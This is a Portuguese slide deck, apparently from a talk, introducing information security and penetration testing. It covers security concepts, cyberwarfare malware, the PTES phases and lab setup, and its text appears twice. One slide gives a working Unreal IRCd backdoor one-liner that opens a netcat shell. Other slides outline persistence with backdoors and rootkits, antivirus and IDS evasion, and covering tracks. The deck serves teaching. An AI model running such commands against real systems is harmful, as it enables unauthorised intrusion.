Escolha 
Penetration Testing 
autor: 
Leandro Quibem Magnabosco 
seu lado 
Segurança da Informação 
contato: 
leandroqm@gmail.com
Quem sou eu? 
Leandro Quibem Magnabosco 
leandroqm@gmail.com 
❖ Consultor de Tecnologia desde 2001 
➢ Segurança da Informação 
➢ Projetos de Redes de Computadores 
➢ Administração de Sistemas 
➢ [...] 
❖ Mestrando em Ciências da Computação 
❖ Usuário de Linux desde 1999 
❖ Certificacões: OSCP (PWB), CCNA, [...]
Quem é você? 
(caso queira se tornar um Pentester) 
❖ Gosta de: 
➢ Tecnologia 
➢ Sistemas operacionais 
➢ Redes de Computadores 
➢ Programação 
➢ Escrever artigos técnicos 
➢ Desafios 
➢ Aprender 
❖ Suas características: 
➢ Autodidata 
➢ Analítico 
➢ Crítico, porém positivo 
➢ Competitivo 
➢ Persistente
InfoSec O que é 
❖ Segurança da Informação 
❖ É a prática de defender a 
informação de (da): 
➢ acesso indevido, 
➢ revelação, 
➢ interrupção do seu fluxo, 
➢ modificação, 
➢ adulteração, 
➢ inspeção, 
➢ gravação ou 
➢ destruição
InfoSec O que é 
❖ CID ou CIA 
➢ Confidencialidade 
➢ Integridade 
➢ Disponibilidade 
❖ AAA 
➢ Autenticação 
➢ Autorização 
➢ Auditoria 
❖ Não-Repúdio 
➢ Não fui eu 
➢ Não sei de nada
InfoSec O que é 
❖ Análise de Risco 
➢ Análise de Malwares 
■ Engenharia Reversa 
➢ Análise de Sistemas 
■ Avaliação crítica e 
analítica de sistemas 
➢ Avaliação de Ameaças 
■ Categorização e 
descoberta de ameaças 
➢ Penetration Testing 
■ Simulação de inimigo 
● Engenharia Social 
● Ataques Internos
InfoSec O que é 
❖ Proteção e Prevenção 
➢ Criptografia 
➢ Design de Redes 
■ Camadas, Firewalls, [...] 
➢ Segurança de Redes 
■ IDS/IPS, VPNs, VLANs, [...] 
➢ Administração de Sistemas 
■ ACLs, Privilégios, [...] 
➢ Compliance 
■ Certificação, Políticas, [...] 
➢ Programação Segura 
■ Validação de entrada, [...]
InfoSec O que é 
❖ Outros 
➢ Forência Digital 
■ Resposta a Incidentes, [...] 
➢ Plano de Continuidade de 
Negócios (PCN) 
■ Backup, Redundância, [...] 
➢ Treinamento 
■ Não somente em 
ataque/defesa 
➢ Educação 
■ Treinamento de usuários 
● Clientes e Usuários
InfoSec O que não é 
❖ Panacéia 
➢ Não há solução única 
❖ Infalível 
➢ Basta UMA vulnerabilidade 
❖ Simples de aprender 
➢ Envolve todas as áreas de 
conhecimento 
❖ Fácil de Implementar 
➢ Envolve tudo que é eletrônico 
❖ Bem Recebida 
➢ Decore: sS40-L1##0s++Sho0 
❖ Dinheiro fácil 
➢ É preciso muito nome e lábia 
❖ Padronizado 
➢ Cada caso é uma solução 
diferente
InfoSec Mercado 
❖ Estável e Crescente 
➢ > 80% no mesmo empregador 
❖ Demanda altíssima por profissionais 
➢ Crescimento > 11% ao ano até 
2019 (num. de profissionais) 
➢ Crescimento > 20% ao ano até 
2019 (demanda) 
❖ Conhecimento e certificações tem 
muito peso 
➢ Certificações para agradar RH 
■ Fáceis, mas conhecidas 
➢ Certificações para VOCÊ! 
■ Obscuras e difíceis
InfoSec Mercado 
❖ Vulnerabilidade em aplicações é 
a maior preocupação atual 
❖ BYOD e Computacão em 
Nuvens vem em segundo 
❖ Multidisciplinaridade é 
extremamente valorizada e cada 
vez mais necessária 
Não há software tão eficiente 
quanto um profissional de 
segurança da informação na 
mesma função!
InfoSec Cyber Warfare 
❖ O mundo está em guerra! 
➢ Os governos estão 
contratando boa parte dos 
profissionais do mercado 
❖ Cyber-Armys em números 
(estimativa): 
➢ China: 71.000 
➢ EUA: 31.000 
➢ Rússia: 7.300 
➢ Coréia do Norte: 6.000
InfoSec Cyber Warfare 
País % Tráfego População 
China 41% 1.46bi 
EUA 10% 318mi 
Turquia 4.7% 76.6mi 
Russia 4.3% 146mi 
Taiwan 3.7% 23.4mi 
Brasil 3.3% 203mi 
Romenia 2.8% 19.9mi 
India 2.3% 1.26bi 
Itália 1.6% 60.7mi 
Hungria 1.4% 9.8mi
Cyberguerra Malware - Flame 
❖ FLAME 
➢ Feito pela NSA, CIA e Israel 
➢ Mais complexo da história 
➢ Possuía "kill-switch" 
➢ Espionagem high-tech 
■ Skype, Contatos (Bluetooth), 
Áudio ambiente, Teclas 
Digitadas, Screnshots, Tráfego 
de rede 
➢ Governos afetados: 
■ Iran, Israel, Palestina, Sudão, 
Síria, Líbano, Arábia S., Egito, 
[...]
Cyberguerra Malware - Duqu 
❖ Duqu 
➢ Explora: 
(exploit) parser daTrueType do Word 
(shellcode) kernel do Windows 
➢ Ataca controles industriais 
(ICS - SCADA) 
➢ Tinha servidores de comando 
nos seguintes países: 
■ Alemanha 
■ Bélgica 
■ Filipinas 
■ China
Cyberguerra Malware - Stuxnet 
❖ Descoberto em 2010 
❖ Desenhado para atacar PLCs em 
sistemas SCADA 
➢ PLC - Programmable Logic 
Controller 
■ Controle de processos 
eletromecânicos 
➢ SCADA - Supervisory Control 
and Data Aquisition 
■ Sistema Computadorizado 
de Controle Industrial 
❖ Desenvolvido pelos Estados Unidos 
em conjunto com Israel para atrasar 
o enriquecimento de urânio no Iran
Cyberguerra Red October
Last Change No turning back!
Pentest O que é 
❖ Modalide de Hacking Ético 
❖ Definição: 
Simular um adversário malicioso 
para avaliar a segurança de um 
sistema computacional, 
dispositivo ou rede 
❖ Em outras palavras: 
➢ Em um cenário real, que 
tipo de problemas um 
hacker habilidoso poderia 
trazer para meus sistemas 
ou minha companhia?
Pentest Pra que serve? 
❖ Determinar a viabilidade de um 
conjunto de vetores de ataque 
❖ Identificar vulnerabilidades de 
alto risco resultantes de uma 
combinação de vulnerabilidades 
de baixo risco 
❖ Avaliar a magnitude do impacto 
operacional em caso de ataque 
❖ Prover evidências para justificar 
o custo no investimento em 
segurança da informação para 
investidores 
❖ [...]
Pentesting Onde encaixa? 
❖ Unifica diversos nichos de 
Segurança da Informação 
❖ É mais difícil que o trabalho do 
atacante malicioso 
➢ Não importa onde as 
vulnerabilidades estão 
➢ Não importa quantas são 
■ O atacante malicioso 
precisa encontrar 
quantas? 
➢ E quem faz o Relatório?
Pentesting Engenharia Social 
❖ Manipulação psicológica 
❖ Explora vulnerabilidades 
inerentes de seres humanos 
❖ Phishing 
➢ Phone Phishing 
➢ Baiting 
❖ Quid pro quo 
❖ Tailgating
Conceitos Ferramentas 
❖ Server-side / Client Side Attack 
❖ Google Hacking 
❖ Wayback Machine 
❖ DoS / DDoS 
❖ Banners 
❖ Bruteforce 
❖ Rainbow Tables 
❖ Sniffing 
❖ Hijacking 
❖ Cache Poisoning (ARP/DNS) 
❖ MIDM/MITM 
❖ Spoofing (IP/MAC/ARP) 
❖ Backdoor 
❖ Core Impact 
❖ Metasploit 
❖ W3AF 
❖ BurpSuite 
❖ Nessus / OpenVAS 
❖ Armitage 
❖ Wireshark 
❖ Ettercap 
❖ nmap 
❖ netcat 
❖ ssh 
❖ curl 
❖ [...]
Unreal IRCd 
eXploit 
echo "AB;nc -l -e /bin/sh -p 12345" | ncat IP 6667
Shellshock 
eXploit
Heartbleed 
vulnerability
Pentesting Padrão 
❖ Usaremos como base o PTES: 
Penetration Testing Execution 
Standard 
http://www.pentest-standard.org/ 
❖ PTES é uma tentativa de 
formalizar os testes de 
penetração 
➢ é colaborativo 
➢ grande parte da 
comunidade colabora com o 
PTES
Pentesting Etapas 
ETAPA NOME NO PTES 
1. Preparação (Pre-Engangement) 
2. Coleta de Informações (Intelligence Gathering) 
3. Modelagem de Ameaças (Threat Modelling) 
4. Análise de Vulnerabilidades (Vulnerability Analysys) 
5. Corrupção / Invasão (Exploitation) 
6. Pós-Engajamento (Não está no PTES) 
7. Relatório (Reporting)
Etapa 1 Preparação 
Objetivos: 
1. Definir Escopo 
2. Definir Objetivos 
3. Termos do Teste 
4. Comunicação 
5. Regras do Ataque 
6. Capacidade Técnica do cliente e 
Tecnologias em Uso 
7. Proteger-se 
● Discutir na reunião de definição 
do Escopo: 
○ Engenharia Social, BYOC, 
DoS e DDoS, [...]) 
● Sempre se informe sobre em 
que país estão os servidores 
● Há algum sistema frágil ou que 
devemos evitar? 
● Contatos de emergência 
● Como lidar com evidências 
● [...]
Etapa 2 Coleta de Inf. 
1. Seleção de alvos 
a. Pela importância para o 
negócio ou localização na 
topologia de rede 
2. OSINT 
a. O que é público 
3. HUMINT 
a. Engenharia Social 
4. Avaliação Interna 
5. Avaliação Externa 
6. Identificar mecanismos de 
segurança
Etapa 3 Org. Ameaças 
1. Identificar Ativos 
a. O que importa para seu 
cliente? 
2. Análise de Processos do Cliente 
3. Análise de Ameaças 
a. Competidores 
b. Usuários Internos 
i. Funcionários 
insatisfeitos 
c. Espionagem Industrial 
4. Análise da Capacidade das 
Ameaças
Etapa 4 Análise de Vuln. 
1. Testes 
a. Ativos: Scanning 
b. Passivos: Sniffing 
2. Validação 
a. Correlacionar 
Scaneamentos 
b. Teste manual 
3. Pesquisa 
a. www.exploit-db.com 
b. Google Hacking 
c. Senhas padrão 
d. Replicar ambiente para 
testes
Etapa 5 Invasão 
1. Evadir mecanismos de segurança 
a. Encoding (Evasão de AV) 
b. Proccess Injection 
2. Verificar possibilidades de DoS 
a. Se acordado na Etapa 1 
3. Verificar exploits públicos 
a. É comum que tenham 
backdoors 
4. Desenvolver Exploits 
a. Se necessário... 
5. Executar ataque 
a. Abuse de técnicas de Evasão 
de IDS/IPS sempre que puder
Etapa 6 Pós-Engajamento 
1. Análise de Infra 
a. VPNs, Rotas, Proxies, 
Topografia da Rede 
2. Identificar o que é importante 
a. Câmeras, Repositórios de 
Código, Bancos de Dados 
3. Capturar ativos e evidências 
4. Island Hopping 
5. Garantir acesso 
a. Credenciais, Backdoors, 
Conexões reversas, 
Rootkits 
6. Limpeza - Você nunca esteve lá
Etapa 7 Relatório 
1. Garantir Documentação 
2. Arquivar Evidências e 
criptografá-las para entrega 
3. Restaurar backups (se 
necessário) 
4. Geração do Sumário Executivo 
a. O que foi encontrado 
b. Recomendações em bom 
português 
5. Relatório Técnico 
a. Detalhado e com sugestões 
b. Procure sempre elogiar tudo 
que encontrar de positivo
Como aprender Pentesting 
❖ Seja autodidata! 
❖ Estude tópicos de interesse 
➢ Sistemas Operacionais 
■ Linux, Windows, 
FreeBSD, [...] 
➢ Protocolos de Rede 
➢ Banco de Dados 
■ MySQL + NoSQL 
➢ Arqtuitetura Web 
➢ Programação 
➢ Tipos mais comuns de bugs
Como aprender Pentesting 
❖ Livros não te ensinam 
Pentesting 
➢ ideias e ferramentas 
❖ Seja criativo! 
❖ Foque onde você é melhor 
Se for possível substituí-lo por 
uma ferramenta automatizada, 
você será! 
❖ Faça DIREITO! 
➢ Cortar caminho é regredir 
❖ Aprenda a explorar as 
vulnerabilidades manualmente
Laboratório Vantagens 
❖ Vantagens 
➢ Evita problemas com a lei 
➢ Não há limitação de banda 
➢ Pode-se testar DoS 
➢ Scanning agressivo 
➢ Replicação de cenários 
➢ Elaboração de exploits 
➢ Mais próximo do mundo real 
sem infringir leis 
➢ Aprenda no seu ritmo
Laboratório Desvantagens 
❖ Desvantagens: 
➢ Pode custar caro 
➢ Limitação de espaço 
➢ Gastos com energia 
➢ Difícil de conseguir 
diversidade 
➢ Alta complexidade para 
replicar certos cenários 
➢ Implementação trabalhosa 
➢ Pode criar vulnerabilidades 
na sua rede abertas ao 
mundo
Laboratório Solução 
❖ Virtualização 
➢ Menos máquinas 
➢ Menos espaço físico 
➢ Roteamento interno 
❖ VLANs 
➢ Dividir redes 
❖ Emuladores 
❖ LiveCDs e Preparados 
➢ Metasploitable 
➢ Damn Vulnerable Webapp 
➢ Damn Vulnerable Linux 
➢ DE-ICE 
➢ pWnOS
Dicas Informações 
❖ Reddit 
➢ www.reddit.com/r/netsec 
➢ www.reddit.com/r/asknetsec 
➢ www.reddit.com/r/netsecstudents 
❖ IRC - irc.FreeNode.org 
➢ #offsec, #linux, #debian, #python 
❖ Listas de e-mail 
➢ http://seclists.org/fulldisclosure/ 
❖ Web 
➢ https://isc.sans.edu// 
➢ http://www.cio.com/category/security/ 
❖ Twitter: @advanced_sec, @TheHackerNews 
@corelanc0d3r, @kevinmitnick, @mubix, 
@hdmoore, [...]

Infosec e pentesting - Escolha o seu lado!

  • 1.
    Escolha Penetration Testing autor: Leandro Quibem Magnabosco seu lado Segurança da Informação contato: leandroqm@gmail.com
  • 2.
    Quem sou eu? Leandro Quibem Magnabosco leandroqm@gmail.com ❖ Consultor de Tecnologia desde 2001 ➢ Segurança da Informação ➢ Projetos de Redes de Computadores ➢ Administração de Sistemas ➢ [...] ❖ Mestrando em Ciências da Computação ❖ Usuário de Linux desde 1999 ❖ Certificacões: OSCP (PWB), CCNA, [...]
  • 3.
    Quem é você? (caso queira se tornar um Pentester) ❖ Gosta de: ➢ Tecnologia ➢ Sistemas operacionais ➢ Redes de Computadores ➢ Programação ➢ Escrever artigos técnicos ➢ Desafios ➢ Aprender ❖ Suas características: ➢ Autodidata ➢ Analítico ➢ Crítico, porém positivo ➢ Competitivo ➢ Persistente
  • 4.
    InfoSec O queé ❖ Segurança da Informação ❖ É a prática de defender a informação de (da): ➢ acesso indevido, ➢ revelação, ➢ interrupção do seu fluxo, ➢ modificação, ➢ adulteração, ➢ inspeção, ➢ gravação ou ➢ destruição
  • 5.
    InfoSec O queé ❖ CID ou CIA ➢ Confidencialidade ➢ Integridade ➢ Disponibilidade ❖ AAA ➢ Autenticação ➢ Autorização ➢ Auditoria ❖ Não-Repúdio ➢ Não fui eu ➢ Não sei de nada
  • 6.
    InfoSec O queé ❖ Análise de Risco ➢ Análise de Malwares ■ Engenharia Reversa ➢ Análise de Sistemas ■ Avaliação crítica e analítica de sistemas ➢ Avaliação de Ameaças ■ Categorização e descoberta de ameaças ➢ Penetration Testing ■ Simulação de inimigo ● Engenharia Social ● Ataques Internos
  • 7.
    InfoSec O queé ❖ Proteção e Prevenção ➢ Criptografia ➢ Design de Redes ■ Camadas, Firewalls, [...] ➢ Segurança de Redes ■ IDS/IPS, VPNs, VLANs, [...] ➢ Administração de Sistemas ■ ACLs, Privilégios, [...] ➢ Compliance ■ Certificação, Políticas, [...] ➢ Programação Segura ■ Validação de entrada, [...]
  • 8.
    InfoSec O queé ❖ Outros ➢ Forência Digital ■ Resposta a Incidentes, [...] ➢ Plano de Continuidade de Negócios (PCN) ■ Backup, Redundância, [...] ➢ Treinamento ■ Não somente em ataque/defesa ➢ Educação ■ Treinamento de usuários ● Clientes e Usuários
  • 9.
    InfoSec O quenão é ❖ Panacéia ➢ Não há solução única ❖ Infalível ➢ Basta UMA vulnerabilidade ❖ Simples de aprender ➢ Envolve todas as áreas de conhecimento ❖ Fácil de Implementar ➢ Envolve tudo que é eletrônico ❖ Bem Recebida ➢ Decore: sS40-L1##0s++Sho0 ❖ Dinheiro fácil ➢ É preciso muito nome e lábia ❖ Padronizado ➢ Cada caso é uma solução diferente
  • 10.
    InfoSec Mercado ❖Estável e Crescente ➢ > 80% no mesmo empregador ❖ Demanda altíssima por profissionais ➢ Crescimento > 11% ao ano até 2019 (num. de profissionais) ➢ Crescimento > 20% ao ano até 2019 (demanda) ❖ Conhecimento e certificações tem muito peso ➢ Certificações para agradar RH ■ Fáceis, mas conhecidas ➢ Certificações para VOCÊ! ■ Obscuras e difíceis
  • 11.
    InfoSec Mercado ❖Vulnerabilidade em aplicações é a maior preocupação atual ❖ BYOD e Computacão em Nuvens vem em segundo ❖ Multidisciplinaridade é extremamente valorizada e cada vez mais necessária Não há software tão eficiente quanto um profissional de segurança da informação na mesma função!
  • 12.
    InfoSec Cyber Warfare ❖ O mundo está em guerra! ➢ Os governos estão contratando boa parte dos profissionais do mercado ❖ Cyber-Armys em números (estimativa): ➢ China: 71.000 ➢ EUA: 31.000 ➢ Rússia: 7.300 ➢ Coréia do Norte: 6.000
  • 13.
    InfoSec Cyber Warfare País % Tráfego População China 41% 1.46bi EUA 10% 318mi Turquia 4.7% 76.6mi Russia 4.3% 146mi Taiwan 3.7% 23.4mi Brasil 3.3% 203mi Romenia 2.8% 19.9mi India 2.3% 1.26bi Itália 1.6% 60.7mi Hungria 1.4% 9.8mi
  • 14.
    Cyberguerra Malware -Flame ❖ FLAME ➢ Feito pela NSA, CIA e Israel ➢ Mais complexo da história ➢ Possuía "kill-switch" ➢ Espionagem high-tech ■ Skype, Contatos (Bluetooth), Áudio ambiente, Teclas Digitadas, Screnshots, Tráfego de rede ➢ Governos afetados: ■ Iran, Israel, Palestina, Sudão, Síria, Líbano, Arábia S., Egito, [...]
  • 15.
    Cyberguerra Malware -Duqu ❖ Duqu ➢ Explora: (exploit) parser daTrueType do Word (shellcode) kernel do Windows ➢ Ataca controles industriais (ICS - SCADA) ➢ Tinha servidores de comando nos seguintes países: ■ Alemanha ■ Bélgica ■ Filipinas ■ China
  • 16.
    Cyberguerra Malware -Stuxnet ❖ Descoberto em 2010 ❖ Desenhado para atacar PLCs em sistemas SCADA ➢ PLC - Programmable Logic Controller ■ Controle de processos eletromecânicos ➢ SCADA - Supervisory Control and Data Aquisition ■ Sistema Computadorizado de Controle Industrial ❖ Desenvolvido pelos Estados Unidos em conjunto com Israel para atrasar o enriquecimento de urânio no Iran
  • 18.
  • 19.
    Last Change Noturning back!
  • 20.
    Pentest O queé ❖ Modalide de Hacking Ético ❖ Definição: Simular um adversário malicioso para avaliar a segurança de um sistema computacional, dispositivo ou rede ❖ Em outras palavras: ➢ Em um cenário real, que tipo de problemas um hacker habilidoso poderia trazer para meus sistemas ou minha companhia?
  • 21.
    Pentest Pra queserve? ❖ Determinar a viabilidade de um conjunto de vetores de ataque ❖ Identificar vulnerabilidades de alto risco resultantes de uma combinação de vulnerabilidades de baixo risco ❖ Avaliar a magnitude do impacto operacional em caso de ataque ❖ Prover evidências para justificar o custo no investimento em segurança da informação para investidores ❖ [...]
  • 22.
    Pentesting Onde encaixa? ❖ Unifica diversos nichos de Segurança da Informação ❖ É mais difícil que o trabalho do atacante malicioso ➢ Não importa onde as vulnerabilidades estão ➢ Não importa quantas são ■ O atacante malicioso precisa encontrar quantas? ➢ E quem faz o Relatório?
  • 23.
    Pentesting Engenharia Social ❖ Manipulação psicológica ❖ Explora vulnerabilidades inerentes de seres humanos ❖ Phishing ➢ Phone Phishing ➢ Baiting ❖ Quid pro quo ❖ Tailgating
  • 24.
    Conceitos Ferramentas ❖Server-side / Client Side Attack ❖ Google Hacking ❖ Wayback Machine ❖ DoS / DDoS ❖ Banners ❖ Bruteforce ❖ Rainbow Tables ❖ Sniffing ❖ Hijacking ❖ Cache Poisoning (ARP/DNS) ❖ MIDM/MITM ❖ Spoofing (IP/MAC/ARP) ❖ Backdoor ❖ Core Impact ❖ Metasploit ❖ W3AF ❖ BurpSuite ❖ Nessus / OpenVAS ❖ Armitage ❖ Wireshark ❖ Ettercap ❖ nmap ❖ netcat ❖ ssh ❖ curl ❖ [...]
  • 25.
    Unreal IRCd eXploit echo "AB;nc -l -e /bin/sh -p 12345" | ncat IP 6667
  • 26.
  • 27.
  • 28.
    Pentesting Padrão ❖Usaremos como base o PTES: Penetration Testing Execution Standard http://www.pentest-standard.org/ ❖ PTES é uma tentativa de formalizar os testes de penetração ➢ é colaborativo ➢ grande parte da comunidade colabora com o PTES
  • 29.
    Pentesting Etapas ETAPANOME NO PTES 1. Preparação (Pre-Engangement) 2. Coleta de Informações (Intelligence Gathering) 3. Modelagem de Ameaças (Threat Modelling) 4. Análise de Vulnerabilidades (Vulnerability Analysys) 5. Corrupção / Invasão (Exploitation) 6. Pós-Engajamento (Não está no PTES) 7. Relatório (Reporting)
  • 30.
    Etapa 1 Preparação Objetivos: 1. Definir Escopo 2. Definir Objetivos 3. Termos do Teste 4. Comunicação 5. Regras do Ataque 6. Capacidade Técnica do cliente e Tecnologias em Uso 7. Proteger-se ● Discutir na reunião de definição do Escopo: ○ Engenharia Social, BYOC, DoS e DDoS, [...]) ● Sempre se informe sobre em que país estão os servidores ● Há algum sistema frágil ou que devemos evitar? ● Contatos de emergência ● Como lidar com evidências ● [...]
  • 31.
    Etapa 2 Coletade Inf. 1. Seleção de alvos a. Pela importância para o negócio ou localização na topologia de rede 2. OSINT a. O que é público 3. HUMINT a. Engenharia Social 4. Avaliação Interna 5. Avaliação Externa 6. Identificar mecanismos de segurança
  • 32.
    Etapa 3 Org.Ameaças 1. Identificar Ativos a. O que importa para seu cliente? 2. Análise de Processos do Cliente 3. Análise de Ameaças a. Competidores b. Usuários Internos i. Funcionários insatisfeitos c. Espionagem Industrial 4. Análise da Capacidade das Ameaças
  • 33.
    Etapa 4 Análisede Vuln. 1. Testes a. Ativos: Scanning b. Passivos: Sniffing 2. Validação a. Correlacionar Scaneamentos b. Teste manual 3. Pesquisa a. www.exploit-db.com b. Google Hacking c. Senhas padrão d. Replicar ambiente para testes
  • 34.
    Etapa 5 Invasão 1. Evadir mecanismos de segurança a. Encoding (Evasão de AV) b. Proccess Injection 2. Verificar possibilidades de DoS a. Se acordado na Etapa 1 3. Verificar exploits públicos a. É comum que tenham backdoors 4. Desenvolver Exploits a. Se necessário... 5. Executar ataque a. Abuse de técnicas de Evasão de IDS/IPS sempre que puder
  • 35.
    Etapa 6 Pós-Engajamento 1. Análise de Infra a. VPNs, Rotas, Proxies, Topografia da Rede 2. Identificar o que é importante a. Câmeras, Repositórios de Código, Bancos de Dados 3. Capturar ativos e evidências 4. Island Hopping 5. Garantir acesso a. Credenciais, Backdoors, Conexões reversas, Rootkits 6. Limpeza - Você nunca esteve lá
  • 36.
    Etapa 7 Relatório 1. Garantir Documentação 2. Arquivar Evidências e criptografá-las para entrega 3. Restaurar backups (se necessário) 4. Geração do Sumário Executivo a. O que foi encontrado b. Recomendações em bom português 5. Relatório Técnico a. Detalhado e com sugestões b. Procure sempre elogiar tudo que encontrar de positivo
  • 37.
    Como aprender Pentesting ❖ Seja autodidata! ❖ Estude tópicos de interesse ➢ Sistemas Operacionais ■ Linux, Windows, FreeBSD, [...] ➢ Protocolos de Rede ➢ Banco de Dados ■ MySQL + NoSQL ➢ Arqtuitetura Web ➢ Programação ➢ Tipos mais comuns de bugs
  • 39.
    Como aprender Pentesting ❖ Livros não te ensinam Pentesting ➢ ideias e ferramentas ❖ Seja criativo! ❖ Foque onde você é melhor Se for possível substituí-lo por uma ferramenta automatizada, você será! ❖ Faça DIREITO! ➢ Cortar caminho é regredir ❖ Aprenda a explorar as vulnerabilidades manualmente
  • 40.
    Laboratório Vantagens ❖Vantagens ➢ Evita problemas com a lei ➢ Não há limitação de banda ➢ Pode-se testar DoS ➢ Scanning agressivo ➢ Replicação de cenários ➢ Elaboração de exploits ➢ Mais próximo do mundo real sem infringir leis ➢ Aprenda no seu ritmo
  • 41.
    Laboratório Desvantagens ❖Desvantagens: ➢ Pode custar caro ➢ Limitação de espaço ➢ Gastos com energia ➢ Difícil de conseguir diversidade ➢ Alta complexidade para replicar certos cenários ➢ Implementação trabalhosa ➢ Pode criar vulnerabilidades na sua rede abertas ao mundo
  • 42.
    Laboratório Solução ❖Virtualização ➢ Menos máquinas ➢ Menos espaço físico ➢ Roteamento interno ❖ VLANs ➢ Dividir redes ❖ Emuladores ❖ LiveCDs e Preparados ➢ Metasploitable ➢ Damn Vulnerable Webapp ➢ Damn Vulnerable Linux ➢ DE-ICE ➢ pWnOS
  • 43.
    Dicas Informações ❖Reddit ➢ www.reddit.com/r/netsec ➢ www.reddit.com/r/asknetsec ➢ www.reddit.com/r/netsecstudents ❖ IRC - irc.FreeNode.org ➢ #offsec, #linux, #debian, #python ❖ Listas de e-mail ➢ http://seclists.org/fulldisclosure/ ❖ Web ➢ https://isc.sans.edu// ➢ http://www.cio.com/category/security/ ❖ Twitter: @advanced_sec, @TheHackerNews @corelanc0d3r, @kevinmitnick, @mubix, @hdmoore, [...]